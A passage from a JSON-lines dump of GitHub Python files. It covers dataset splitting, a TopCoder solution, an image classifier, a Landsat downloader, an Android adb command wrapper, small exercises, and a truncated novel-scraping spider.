greedy_object.set_bid(bid)\n weight = np.random.rand(3)\n weight[2] *= 2\n weight = weight / np.sum(weight)\n greedy_object.set_weight(weight)\n\n\n result = np.vstack(tuple(result))\n np.save('data/{}_{}_uniform_result.npy'.format(kind, budget), result)\n\n\n","repo_name":"Osagawara/text_classification","sub_path":"greedy_selection.py","file_name":"greedy_selection.py","file_ext":"py","file_size_in_byte":5403,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"23104624099","text":"import pandas as pd \nimport numpy as np\nfrom argparse import ArgumentParser\nimport json\nimport os \nimport sklearn\n\nargparser=ArgumentParser(\"Splits the desired csv file to 3 different files for training/validation/test\")\n\nargparser.add_argument(\n '-c',\n '--conf',\n default='/content/lepidoptera/script/lepidoptere_detection/src/config/lepido_detection.json',\n help='path to configuration file')\n\ndef _main_(args):\n\n config_path=args.conf\n\n with open(config_path) as config_buffer:\n config=json.loads(config_buffer.read())\n\n path_to_dataset=\"/content/lepidoptera/script/lepidoptere_detection/src/data/inputs/all_annotations.csv\"\n\n with open(path_to_dataset, 'r') as f:\n lines = f.readlines()\n img_path = []\n for line in lines:\n line = line.replace('\\n', '')\n line = line.split(',')\n img_path.append(line[0])\n img_path = set(img_path)\n print(\"Il y a 433 images différents dans le csv final\", len(img_path))\n\n # proportion of the splits of the whole dataset\n\n proportion_train=0.8\n proportion_val=0.1\n \n count = 0\n \n df=pd.read_csv(path_to_dataset)\n print(df.head())\n limit_train = int(proportion_train*len(img_path))\n print(\"limit_train\", limit_train)\n limit_validation = int(proportion_val*len(img_path))\n limit_test = len(img_path) - limit_train - limit_validation\n #on veut afficher une liste contenant les éléments de la première colonne\n print(\"il y a 433 images différentes dans le csv qu'on split\", len(df.iloc[:,0].unique()))\n\n with open(path_to_dataset, 'r') as f:\n lines = f.readlines()\n with open(\"/content/lepidoptera/script/lepidoptere_detection/src/data/inputs/train.csv\", 'w') as f2:\n for i, line in enumerate(lines):\n #on veut ajouter limit_train image différent au csv train.csv\n if count < limit_train:\n line1 = lines[i].split(',')\n line2 = lines[i+1].split(',')\n \n if line1[0] == line2[0]:\n f2.write(lines[i])\n a = lines[i]\n else:\n count += 1\n f2.write(lines[i])\n a = lines[i]\n \n else:\n break\n count = 0\n with open(\"/content/lepidoptera/script/lepidoptere_detection/src/data/inputs/valid.csv\", 'w') as f3:\n #on veut enlever tous les éléments avant a dans la liste lines\n j = lines.index(a)\n for i in range(j, len(lines)):\n if count < limit_validation:\n line1 = lines[i].split(',')\n line2 = lines[i+1].split(',')\n if line1[0] == line2[0]:\n f3.write(lines[i])\n b = lines[i]\n else:\n count += 1\n f3.write(lines[i])\n b = lines[i]\n else:\n break\n count = 0\n with open(\"/content/lepidoptera/script/lepidoptere_detection/src/data/inputs/test.csv\", 'w') as f4:\n j = lines.index(b)\n for i in range(j, len(lines)):\n if count < limit_test:\n line1 = lines[i].split(',')\n line2 = lines[i+1].split(',')\n if line1[0] == line2[0]:\n f4.write(lines[i])\n else:\n count += 1\n f4.write(lines[i])\n else:\n break\n\n #vérifions s'il n'y pas une image qui est présente dans deux csv différents\n\n with open(\"/content/lepidoptera/script/lepidoptere_detection/src/data/inputs/train.csv\", 'r') as f5:\n lines = f5.readlines()\n img_path = []\n for line in lines:\n line = line.replace('\\n', '')\n line = line.split(',')\n img_path.append(line[0])\n img_path = set(img_path)\n\n with open(\"/content/lepidoptera/script/lepidoptere_detection/src/data/inputs/valid.csv\", 'r') as f6:\n lines = f6.readlines()\n img_path2 = []\n for line in lines:\n line = line.replace('\\n', '')\n line = line.split(',')\n img_path2.append(line[0])\n img_path2 = set(img_path2)\n\n with open(\"/content/lepidoptera/script/lepidoptere_detection/src/data/inputs/test.csv\", 'r') as f7:\n lines = f7.readlines()\n img_path3 = []\n for line in lines:\n line = line.replace('\\n', '')\n line = line.split(',')\n img_path3.append(line[0])\n img_path3 = set(img_path3)\n\n #regardons si les listes ont un élément en commun\n print(\"il y a\", len(img_path.intersection(img_path2)), \"images en commun entre train et valid\")\n print(\"il y a\", len(img_path.intersection(img_path3)), \"images en commun entre train et test\")\n\n\n\nif __name__=='__main__':\n _args = argparser.parse_args()\n _main_(args=_args)\n","repo_name":"lucien92/lepidoptera","sub_path":"script/lepidoptere_detection/src/data/inputs/get_train_test_val.py","file_name":"get_train_test_val.py","file_ext":"py","file_size_in_byte":5337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22900216384","text":"class MiniatureDachshund:\n def maxMikan(self, mikan, weight):\n mikan = list(mikan)\n mikan.sort()\n\n counter = 0\n for m in mikan:\n next = weight + m\n if next > 5000:\n break\n\n counter += 1\n weight = next\n\n return counter\n\n# BEGIN KAWIGIEDIT TESTING\n# Generated by KawigiEdit-pfx 2.1.9\nimport sys\nimport time\ndef KawigiEdit_RunTest(testNum, p0, p1, hasAnswer, p2):\n\tsys.stdout.write(str(\"Test \") + str(testNum) + str(\": [\") + str(\"{\"))\n\tfor i in range(len(p0)):\n\t\tif (i > 0):\n\t\t\tsys.stdout.write(str(\",\"))\n\t\t\n\t\tsys.stdout.write(str(p0[i]))\n\t\n\tsys.stdout.write(str(\"}\") + str(\",\") + str(p1))\n\tprint(str(\"]\"))\n\tobj = MiniatureDachshund()\n\tstartTime = time.clock()\n\tanswer = obj.maxMikan(p0, p1)\n\tendTime = time.clock()\n\tres = True\n\tprint(str(\"Time: \") + str((endTime - startTime)) + str(\" seconds\"))\n\tif (hasAnswer):\n\t\tprint(str(\"Desired answer:\"))\n\t\tprint(str(\"\\t\") + str(p2))\n\t\n\tprint(str(\"Your answer:\"))\n\tprint(str(\"\\t\") + str(answer))\n\tif (hasAnswer):\n\t\tres = answer == p2\n\t\n\tif (not res):\n\t\tprint(str(\"DOESN'T MATCH!!!!\"))\n\telif ((endTime - startTime) >= 2):\n\t\tprint(str(\"FAIL the timeout\"))\n\t\tres = False\n\telif (hasAnswer):\n\t\tprint(str(\"Match :-)\"))\n\telse:\n\t\tprint(str(\"OK, but is it right?\"))\n\t\n\tprint(str(\"\"))\n\treturn res\n\nall_right = True\n\n\n# ----- test 0 -----\np0 = [100,100,100,100,100]\np1 = 4750\np2 = 2\nall_right = KawigiEdit_RunTest(0, p0, p1, True, p2) and all_right\n# ------------------\n\n# ----- test 1 -----\np0 = [100,100,100,100,50]\np1 = 4750\np2 = 3\nall_right = KawigiEdit_RunTest(1, p0, p1, True, p2) and all_right\n# ------------------\n\n# ----- test 2 -----\np0 = [120,90,130,100,110,80]\np1 = 3000\np2 = 6\nall_right = KawigiEdit_RunTest(2, p0, p1, True, p2) and all_right\n# ------------------\n\n# ----- test 3 -----\np0 = [50]\np1 = 5000\np2 = 0\nall_right = KawigiEdit_RunTest(3, p0, p1, True, p2) and all_right\n# ------------------\n\n# ----- test 4 -----\np0 = [200,50,200,50,200,50,200,50]\np1 = 4800\np2 = 4\nall_right = KawigiEdit_RunTest(4, p0, p1, True, p2) and all_right\n# ------------------\n\nif (all_right):\n\tprint(str(\"You're a stud (at least on the example cases)!\"))\nelse:\n\tprint(str(\"Some of the test cases had errors.\"))\n\n# PROBLEM STATEMENT\n# Dachshund is a popular dog breed. In this problem, a miniature dachshund is defined as a dachshund whose weight is not more than 5,000 grams.\n# \n# \n# Lun the miniature dachshund loves mikan (satsuma oranges). She has just bought some mikan. You are given a tuple (integer) mikan. It gives the weight of all mikan she bought. For each valid i, mikan[i] is the weight of the i-th mikan in grams.\n# \n# \n# You are also given an integer weight. Currently, Lun weighs weight grams. When she eats i-th mikan, her weight increases by mikan[i] grams. If she eats multiple mikan, her weight increases by their total weight. She cannot eat just a part of a mikan. In other words, if she chooses to eat a mikan, she eats it completely.\n# \n# \n# She wants to remain being a miniature dachshund. That is, she wants her weight not to exceed 5,000 grams. Under this condition, calculate and return the maximum number of mikan Lun can eat.\n# \n# DEFINITION\n# Class:MiniatureDachshund\n# Method:maxMikan\n# Parameters:tuple (integer), integer\n# Returns:integer\n# Method signature:def maxMikan(self, mikan, weight):\n# \n# \n# CONSTRAINTS\n# -mikan will contain between 1 and 50 elements, inclusive.\n# -Each element of mikan will be between 50 and 200, inclusive.\n# -weight will be between 3,000 and 5,000, inclusive.\n# \n# \n# EXAMPLES\n# \n# 0)\n# {100, 100, 100, 100, 100}\n# 4750\n# \n# Returns: 2\n# \n# Here, Lun weighs 4,750 grams and has bought 5 mikan, each of which weighs 100 grams. When she eats 2 of these, her weight will be 4,950 grams. She should not eat more.\n# \n# 1)\n# {100, 100, 100, 100, 50}\n# 4750\n# \n# Returns: 3\n# \n# This time, one of the mikan is smaller. She can eat it with 2 of the 100-gram mikan. Note that her weight is allowed to be exactly 5,000 grams.\n# \n# 2)\n# {120, 90, 130, 100, 110, 80}\n# 3000\n# \n# Returns: 6\n# \n# When she is light enough, she can eat all of the mikan she has bought.\n# \n# 3)\n# {50}\n# 5000\n# \n# Returns: 0\n# \n# When her weight is already 5,000 grams, she should not eat anything.\n# \n# 4)\n# {200, 50, 200, 50, 200, 50, 200, 50}\n# 4800\n# \n# Returns: 4\n# \n# \n# \n# END KAWIGIEDIT TESTING\n\n#Powered by KawigiEdit-pfx 2.1.9!\n","repo_name":"cocodrips/TopCoder","sub_path":"599/MiniatureDachshund.py","file_name":"MiniatureDachshund.py","file_ext":"py","file_size_in_byte":4392,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"17659830138","text":"# Solution 1\nprint(sum(int(ch) for ch in open('numbers_text.txt', 'r')))\n\n# Solution 2\ndef sum_of_numbers(file_name):\n with open(file_name, \"r\") as file:\n return sum(int(x) for x in file)\n\n\nprint(sum_of_numbers('numbers_text.txt'))","repo_name":"AlexanderBedrosyan/Programming-Advanced-with-Python","sub_path":"File Handling - Lab/file_reader/file_reader.py","file_name":"file_reader.py","file_ext":"py","file_size_in_byte":241,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"70089445954","text":"#Thomas Thorpe\r\n#Pet Service System Delete Record Search Windows Function\r\n\r\nfrom PetServiceDatabase import *\r\nfrom Notification import *\r\nfrom AreYouSureWindow import *\r\n\r\ndef DeleteRecord(came_from, current_record_id, table_name):\r\n are_you_sure = ConfirmationWindow(came_from, \"Are you sure you wish to delete this record? This action cannot be undone.\")\r\n are_you_sure.setModal(True)\r\n are_you_sure.show()\r\n are_you_sure.raise_()\r\n decision = are_you_sure.exec_() #confirm deletion window\r\n if decision == 1:\r\n if current_record_id != -1 and current_record_id != \"There Are No Records To Display\":\r\n database.DeleteRecord(table_name, current_record_id)\r\n came_from.DisplayAll()\r\n else: #notify if record not selected\r\n notification = Notification(came_from, \"Please select a record\")\r\n notification.setModal(True)\r\n notification.show()\r\n notification.raise_()","repo_name":"ThomasThorpe/PetMindingBusiness","sub_path":"Program/DeleteRecordSearchWindows.py","file_name":"DeleteRecordSearchWindows.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29890665516","text":"questions_list=[[\"1.how many continenets are there?\"],[\"2.what is capital of india?\"],[\"ng m kon sa course hota h?\"]]\noptions_list=[[\"1.four\",\"2.nine\",\"3.seven\",\"4.eight\"],[\"1.chandigarh\",\"2.bhopal\",\"3.chennai\",\"4.delhi\"],[\"1.software\",\"2.counselling\",\"3.tourism\",\"4.agriculture\"]]\nsolutions_list=[3,4,1]\nlifeline_key=[[\"1.four\",\"3.seven\"],[\"1.chandigarh\",\"4.delhi\"],[\"1.software\",\"2.counselling\"]]\nprint(\"there is one lifeline key if you want you can use it by entering 5050\")\nc=0\ni=0\nwhile i None:\n super().__init__()\n self.crop_size = [crop_size] if isinstance(crop_size, int) else crop_size\n self.resize_size = [resize_size]\n self.resize_max_size = resize_max_size\n self.mean = list(mean)\n self.std = list(std)\n self.interpolation = interpolation\n\n def forward(self, img: torch.Tensor) -> torch.Tensor:\n \"\"\"\n Args:\n img (torch.Tensor): a tensor with values ranging from 0 to 255,\n and with shape [3, height, width].\n\n Returns: a normalized tensor with shape [3, height, width]\n\n \"\"\"\n img = F.resize(\n img,\n self.resize_size,\n max_size=self.resize_max_size,\n interpolation=self.interpolation,\n )\n img = F.center_crop(img, self.crop_size)\n if not isinstance(img, torch.Tensor):\n img = F.pil_to_tensor(img)\n img = F.convert_image_dtype(img, torch.float)\n img = F.normalize(img, mean=self.mean, std=self.std)\n return img\n\n def __repr__(self) -> str:\n format_string = self.__class__.__name__ + \"(\"\n format_string += f\"\\n crop_size={self.crop_size}\"\n format_string += f\"\\n resize_size={self.resize_size}\"\n format_string += f\"\\n mean={self.mean}\"\n format_string += f\"\\n std={self.std}\"\n format_string += f\"\\n interpolation={self.interpolation}\"\n format_string += \"\\n)\"\n return format_string\n\n def describe(self) -> str:\n return (\n \"Accepts ``PIL.Image``, batched ``(B, C, H, W)`` and single ``(C, H, W)`` image ``torch.Tensor`` objects. \"\n f\"The images are resized to ``resize_size={self.resize_size}`` using ``interpolation={self.interpolation}``, \"\n f\"followed by a central crop of ``crop_size={self.crop_size}``. Finally the values are first rescaled to \"\n f\"``[0.0, 1.0]`` and then normalized using ``mean={self.mean}`` and ``std={self.std}``.\"\n )\n\n\nclass ImageClassifier(nn.Module):\n def __init__(self, base_model_name: str, categories, *, transform_configs=None):\n super().__init__()\n transform_configs = transform_configs or dict()\n self.eval_transform = ImageTransform(**transform_configs)\n\n self.categories = categories\n assert len(self.categories) > 1\n\n try:\n model_cls, model_weights = BASE_MODELS[base_model_name]\n except:\n logger.warning(\n f'model {base_model_name} is not supported yet. Use default model `mobilenet_v2` instead'\n )\n model_cls, model_weights = BASE_MODELS['mobilenet_v2']\n\n if model_weights is not None:\n self.base = model_cls(weights=model_weights)\n else:\n self.base = model_cls(pretrained=True)\n\n if 'densenet' in base_model_name:\n last_channel = self.base.classifier.in_features\n dropout = 0.0\n else:\n dropout = self.base.classifier[0].p\n last_channel = self.base.classifier[1].in_features\n self.base.classifier = nn.Sequential(\n nn.Dropout(p=dropout), nn.Linear(last_channel, len(self.categories)),\n )\n\n self.criterion = nn.CrossEntropyLoss()\n\n # weight initialization\n for m in self.modules():\n if isinstance(m, nn.Linear):\n nn.init.normal_(m.weight, 0, 0.01)\n nn.init.zeros_(m.bias)\n\n def load(self, model_fp, device='cpu'):\n self.device = torch.device(device)\n self.to(self.device)\n load_model_params(self, model_fp, device=device)\n\n def forward(self, x: torch.Tensor):\n logits = self.base(x)\n prediction = logits.softmax(dim=1)\n pred_probs, preds = prediction.topk(1, dim=1)\n outs = dict(\n logits=logits, preds=preds.squeeze(-1), probs=pred_probs.squeeze(-1)\n )\n return outs\n\n def calculate_loss(self, batch, **kwargs):\n imgs, labels = batch\n outs = self(imgs)\n loss = self.criterion(outs['logits'], labels)\n\n outs.update(dict(target=labels, loss=loss))\n return outs\n\n @torch.no_grad()\n def predict_images(\n self,\n images: List[Union[str, torch.Tensor]],\n *,\n batch_size: int = 32,\n **loader_kwargs,\n ) -> List[Tuple[str, float]]:\n \"\"\"\n 预测给定图片列表的类别。\n\n Args:\n images (List[Union[str, torch.Tensor]]): if is a torch.Tensor, the tensor should be\n with values ranging from 0 to 255, and with shape [height, width, 3].\n batch_size (int): batch size. Default: 32.\n **loader_kwargs ():\n\n Returns: [(<类别名称>, <对应概率>), (<类别名称>, <对应概率>), (<类别名称>, <对应概率>), ...]\n\n \"\"\"\n self.eval()\n\n def collate_fn(_images):\n img_list = [\n self.eval_transform(_img) for _img in _images if _img is not None\n ]\n imgs = torch.stack(img_list)\n goods = torch.tensor(\n [idx for idx, _img in enumerate(_images) if _img is not None],\n dtype=torch.int32,\n )\n return imgs, goods, torch.tensor(len(_images))\n\n class ListDataset(Dataset):\n def __init__(self, _images):\n self._images = _images\n\n def __getitem__(self, idx):\n img = self._images[idx]\n if isinstance(img, str):\n try:\n img = torch.tensor(\n read_img(img, gray=False).transpose((2, 0, 1))\n )\n except:\n img = None\n elif isinstance(img, torch.Tensor):\n img = img.permute((2, 0, 1))\n return img\n\n def __len__(self):\n return len(self._images)\n\n dataset = ListDataset(images)\n dataloader = DataLoader(\n dataset,\n batch_size=batch_size,\n shuffle=False,\n collate_fn=collate_fn,\n **loader_kwargs,\n )\n\n results = []\n for batch in tqdm.tqdm(dataloader):\n _images = batch[0].to(self.device)\n outs = self(_images)\n goods = batch[1].cpu().numpy().tolist()\n batch_len = int(batch[2].cpu())\n part_res = [(self.categories[0], 1.0 / len(self.categories))] * batch_len\n for idx, pred, prob in zip(\n goods,\n outs['preds'].cpu().numpy().tolist(),\n outs['probs'].cpu().numpy().tolist(),\n ):\n part_res[idx] = (self.categories[pred], prob)\n results.extend(part_res)\n return results\n\n\nif __name__ == '__main__':\n img = torch.tensor(\n read_img(\"dev-samples/dev-0.png\", gray=False).transpose((2, 0, 1))\n )\n\n transform_configs = {\n 'crop_size': [150, 450],\n 'resize_size': 160,\n 'resize_max_size': 1000,\n }\n clf = ImageClassifier(\n base_model_name='mobilenet_v2',\n categories=('bad', 'good'),\n transform_configs=transform_configs,\n )\n clf.eval()\n preprocess = clf.eval_transform\n batch = preprocess(img).unsqueeze(0)\n\n outs = clf(batch)\n\n class_id = outs['preds'][0].item()\n score = outs['probs'][0].item()\n category_name = clf.categories[class_id]\n print(f\"{category_name}: {100 * score:.1f}%\")\n","repo_name":"Samawia2910/CNOCR-AI-","sub_path":"cnocr/classification/image_classifier.py","file_name":"image_classifier.py","file_ext":"py","file_size_in_byte":8932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1564683132","text":"__author__ = 'Jwely'\n\nimport os\nimport cookielib\nimport urllib, urllib2\nimport time\nimport tarfile\n\n\ndef fetch_test_landsat(test_dir):\n \"\"\"\n downloading data from earth explorer requires that users are logged in.\n This function opens a session and stores the required cookies to\n make automated download from earthexplorer.usgs possible.\n\n https://earthexplorer.usgs.gov/login/\n \"\"\"\n\n # list of tiles that will be downloaded by this function\n tiles = [\"http://earthexplorer.usgs.gov/download/3119/LT40410361990014XXX01/STANDARD\",\n \"http://earthexplorer.usgs.gov/download/3119/LT50410362011208PAC01/STANDARD\",\n \"http://earthexplorer.usgs.gov/download/3372/LE70410362003114EDC00/STANDARD\",\n \"http://earthexplorer.usgs.gov/download/4923/LC80410362014232LGN00/STANDARD\"]\n\n\n print(\"This script downloads landsat data from earth explorer by USGS\")\n print(\"This server requires authentication to retrieve data\")\n print(\"This script immediately discards this info after download is complete\\n\")\n username = raw_input(\"please type in your USGS username:\")\n password = raw_input(\"please type in your USGS password:\")\n\n subdir = os.path.join(test_dir, \"raw\",\"Landsat\")\n if not os.path.exists(subdir):\n os.makedirs(subdir)\n\n # build a cookie jar.\n cookies = cookielib.CookieJar()\n\n opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookies))\n\n # build payload\n url = \"https://earthexplorer.usgs.gov/login/\"\n payload = {'username': username,\n 'password': password,\n 'rememberMe': \"1\"}\n\n logdata = urllib.urlencode(payload)\n\n # send the request and receive the response\n opener.open(url, logdata)\n resp = opener.open(\"https://earthexplorer.usgs.gov/login/\")\n text = resp.read()\n\n\n if username in text:\n print(\"Logged into USGS Earth Explorer!\")\n print(\"Beginning downloads, please be patient!\")\n else:\n print(\"Could not Log in!\")\n\n\n # now lets download the data\n for tile in tiles:\n resp = opener.open(tile)\n attachments = resp.headers[\"Content-Disposition\"].split('=')\n filename = attachments[1].replace('\"',\"\").replace(\"'\",\"\")\n\n print(\"Downloading {0}\".format(filename))\n outname = os.path.join(subdir, filename)\n\n try:\n urllib.urlretrieve(resp.url, outname)\n\n except urllib2.HTTPError:\n time.sleep(10) # helps server overload errors\n print(\"Working...\")\n urllib.urlretrieve(resp.url, outname)\n\n # extract the archives and delete tar.gz files.\n print(\"Extracting tifs from tar.gz\")\n time.sleep(3)\n tfile = tarfile.open(outname, 'r:gz')\n outdir = os.path.join(subdir, outname.replace(\".tar.gz\",\"\"))\n tfile.extractall(outdir)\n tfile.close()\n os.remove(outname)\n\n return","repo_name":"NASA-DEVELOP/dnppy","sub_path":"dev/test/fetch_test_landsat.py","file_name":"fetch_test_landsat.py","file_ext":"py","file_size_in_byte":2903,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"61"} +{"seq_id":"20260414466","text":"# TCArg 2020 - Contest #9\n# Removing Columns\n# https://codeforces.com/group/j1UosVRZar/contest/288666/problem/A\n\nif __name__ == \"__main__\":\n\tn, m = [int(x) for x in input().split()]\n\ttable = []\n\tfor _ in range(n):\n\t\ttable.append(list(input()))\n\ti = 1\n\toperations = 0\n\twhile i < n:\n\t\tif table[i - 1] > table[i]:\n\t\t\tfor j in range(m):\n\t\t\t\tif table[i - 1][j] > table[i][j]:\n\t\t\t\t\tbreak\n\t\t\tfor i in range(n):\n\t\t\t\tdel table[i][j]\n\t\t\toperations += 1\n\t\t\ti = 1\n\t\telse:\n\t\t\ti += 1\n\tprint(operations)\n","repo_name":"eloyhz/competitive-programming","sub_path":"tc-arg/contest-09/a_removing_columns.py","file_name":"a_removing_columns.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"8216929329","text":"import EmployeeClass as ec\nimport PayrollDeductionClass as pd\n\nJimmy_Smith = ec.Employee('Jimmy Smith','58475','Information Systems','Developer',6800)\n\ndeduction_1 = pd.Payroll('food court','8/14/2022',22.50,'39119')\ndeduction_2 = pd.Payroll('gift contribution','8/12/2022',25.00,'58475')\ndeduction_3 = pd.Payroll('food court','8/17/2022',15.25,'21547')\ndeduction_4 = pd.Payroll('vending machine','8/22/2022',3.00,'58475')\ndeduction_5 = pd.Payroll('vending machine','8/5/2022',2.75,'58475')\n\n\n\nlist1 = [deduction_1,deduction_2,deduction_3,deduction_4,deduction_5]\n\ntotal_deduction = 0\n\nfor i in list1:\n if i.get_EmployeeID() == '58475':\n total_deduction += i.get_ChargeAmount()\n\nnet_pay = Jimmy_Smith.get_MonthlySalary() - total_deduction\nname = Jimmy_Smith.get_name()\nId_number = Jimmy_Smith.get_IDnumber()\ndepartment = Jimmy_Smith.get_department()\ngross_pay = Jimmy_Smith.get_MonthlySalary()\n\n\n\n\n\nprint('*** Employee Pay ***')\nprint('Name: ',name)\nprint('ID Number: ',Id_number)\nprint('Department: ',department)\nprint('Gross Pay: $',gross_pay)\nprint('Net Pay: $',net_pay)\n\n\n\n\n","repo_name":"WillStutz/Chapter_10_HW","sub_path":"NetPay.py","file_name":"NetPay.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42853089695","text":"# coding=utf-8\n\nimport subprocess\nimport time\nimport os\nimport sys\n\nimport pygame\nfrom pygame.locals import *\n\nfrom adb_warnings import *\nfrom adb_UI import *\n\n# Commands\nADB_COMMANDS = {\n 0: ['adb start-server',\n 'adb devices'],\n 1: ['adb kill-server'],\n 2: ['adb shell screencap -p /sdcard/screen.png',\n 'adb pull /sdcard/screen.png d:/',\n 'adb shell rm /sdcard/screen.png'],\n 3: ['adb root',\n 'adb remount',\n 'adb shell ls system/app',\n 'adb shell rm -rf $1',\n 'adb reboot'],\n 4: ['adb root',\n 'adb push $1 $2',\n 'adb reboot'],\n 5: ['adb shell input keyevent $1'],\n 6: ['adb get-serialno'],\n 7: ['adb devices'],\n 8: ['adb reboot'],\n 9: ['adb reboot bootloader'],\n 10: ['adb reboot recovery'],\n 11: ['adb logcat -t $1'],\n 12: ['adb shell cat /sys/class/net/wlan0/address'],\n 13: ['adb help'],\n 14: ['adb shell cat /proc/cpuinfo'],\n 15: ['adb install $1'],\n 16: ['adb install -r $1'],\n 17: ['adb install -s $1'],\n 18: ['adb uninstall $1'],\n 19: ['adb uninstall -k $1'],\n 20: ['adb shell am start -n $1'],\n 21: ['adb shell top'],\n 22: ['adb shell top -m 6'],\n 23: ['adb shell top -n 1'],\n 24: ['adb shell procrank'],\n 25: ['adb shell kill $1'],\n 26: ['adb shell ps'],\n 27: ['adb shell ps -x $1'],\n 28: ['adb shell service list'],\n 29: ['adb shell cat /proc/meminfo'],\n 30: ['adb shell cat /proc/iomem'],\n 31: ['adb remount'],\n 32: ['adb pull $1 $2'],\n 33: ['adb push $1 $2'],\n 34: ['adb shell ls $1'],\n 35: ['adb shell cd $1'],\n 36: ['adb shell rename $1 $2'],\n 37: ['adb shell rm /system/avi.apk'],\n 38: ['adb shell rm -rf $1'],\n 39: ['adb shell chmod 777 $1'],\n 40: ['adb shell mv $1 $2'],\n 41: ['adb shell mkdir $1'],\n 42: ['adb shell cat $1'],\n 43: ['adb shell cat /data/misc/wifi/*.conf'],\n 44: ['adb logcat -c'],\n 45: ['adb bugreport $1'],\n 46: ['adb shell cat /system/build.prop'],\n 47: ['adb devices',\n 'adb root',\n 'adb remount']\n}\n\n# Max time to wait\nTIME_OUT = 16\n# Min time to wait\nMIN_TIME_EXC = 2\n\n# Commands execution\ndef execute_command(wins, cmd):\n # If cmd = adb shell, then open the COMMAND for WINDOWS\n if cmd in ['adb shell']:\n subprocess.Popen('cmd', shell=True)\n return 0, 'Auto-open COMMAND for further adb shell testing.\\n'\n\n # Execute commands in a subprocess\n sp = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\n\n # Exceed the MIN_TIME_EXC and consider that this command requires more time for IO or it has an instant IO\n # time.sleep(MIN_TIME_EXC)\n\n # Initialize the keyboard event listening\n pygame.init()\n pygame.display.set_mode((1, 1))\n # Relocate the standard output and error information\n while sp.poll() is None and cmd not in ['adb help']: # None: executing. Specific process for 'adb help'\n stdout_info = str(sp.stdout.readline()).strip() + '\\n'\n wins.change_text_display(stdout_info)\n for event in pygame.event.get():\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_q:\n sp.terminate()\n wins.change_text_display('CTRL-C Interrupt Happening...', interrupt=True)\n pygame.quit()\n return 0, '\\n'\n pygame.display.update()\n\n # Cease listening\n pygame.quit()\n stdout_info, stderr_info = sp.communicate()\n res = str(stdout_info) + str(stderr_info) + '\\n'\n return sp.returncode, res\n","repo_name":"SinestroEdmonce/AdbTestSimpleUI","sub_path":"adb_commnd.py","file_name":"adb_commnd.py","file_ext":"py","file_size_in_byte":3574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40210113581","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom books.mysql import msyqlHelper\nfrom urllib.parse import urljoin\nimport logging\nimport re\n\n\nclass FenghuangSpider(scrapy.Spider):\n\tname = 'booke'\n\tallowed_domains = ['biqugex.com','baoliny.com','630book.la','9cwx.com','kanshula.org','xxbiquge.com','wangshuge.com','lewenxiaoshuo.com','22ff.com','23us.cc','wenxuemm.com','yqzww.com']\n\tstart_urls = [\n\t\t\t\t\t['无敌医神','http://www.biqugex.com/book_21372/','//div[@class=\"listmain\"]/dl/dd[position()>12]/a','content'],\n\t\t\t\t\t['超品兵王','http://www.baoliny.com/119720/index.html','/html/body/div[2]/div[4]/table/tr/td/a','content'],\n\t\t\t\t\t['美女保镖','http://www.630book.la/shu/13556.html','//dl[@class=\"zjlist\"]/dd/a','content'],\n\t\t\t\t\t['修仙归来在都市','http://www.9cwx.com/6_6130/','//*[@id=\"list\"]/dl/dd[position()>9]/a','content'],\n\t\t\t\t\t['混迹花都','http://www.kanshula.org/3_3489/0.html','//*[@id=\"list\"]/dl/dd/a','content'],\n\t\t\t\t\t['农民医生','http://www.xxbiquge.com/22_22895/','//*[@id=\"list\"]/dl/dd[position()>17]/a','content'],\n\t\t\t\t\t['纨绔兵王','http://www.wangshuge.com/books/97/97200/','//*[@id=\"at\"]/tr/td/a','contents'],\n\t\t\t\t\t['家有表姐太傲娇','http://www.lewenxiaoshuo.com/books/jiayoubiaojietaiaojiao/','//*[@id=\"list\"]/dl/dd/a','content'],\n\t\t\t\t\t['美女大小姐的贴身兵王','http://www.22ff.com/xs/205845/','//div[@class=\"neirong\"]/div/a','chapter_content'],\n\t\t\t\t\t['情路官道','http://www.23us.cc/html/88/88465/','//div[@id=\"main\"]/div/dl[@class=\"chapterlist\"]/dd/a','content'],\n\t\t\t\t\t['最强废少','http://www.wenxuemm.com/book/46/46492/','//div[@class=\"novel_list\"]/ul/li/a','clickeye_content'],\n\t\t\t\t\t['妙手狂医','http://www.yqzww.com/files/article/html/2/2566/index.html','//div[@class=\"zjlist4\"]/ol/li/a','htmlContent']\n\t\t\t\t]\n\t\n\tdef start_requests(self):\n\t\tmsyql = msyqlHelper()\n\t\tfor url in self.start_urls:\n\t\t\tbook_name = url[0]\n\t\t\tlink = url[1]\n\t\t\tbid = msyql.insertbook(book_name)\n\t\t\tmeta = {}\n\t\t\tmeta['bid'] = bid\n\t\t\tmeta['xpath'] = url[2]\n\t\t\tif len(url) == 5:\n\t\t\t\tmeta['other'] = True\n\t\t\telse:\n\t\t\t\tmeta['other'] = False\n\t\t\tmeta['id'] = url[3]\n\t\t\tyield scrapy.Request(link,callback=self.parse,meta=meta)\n\t\tmsyql.close();\n\tdef parse(self,response):\n\t\tmysql = msyqlHelper()\n\t\told = response.meta\n\t\tnames = set(['上架感言!'])\n\t\tlinks = response.xpath(old['xpath'])\n\t\t\n\t\tj = 1\n\t\tfor link in links:\n\t\t\tname = link.xpath('text()').extract_first();\n\t\t\tif name in names:\n\t\t\t\tcontinue;\n\t\t\thref = link.xpath('@href').extract_first();\n\t\t\turl = 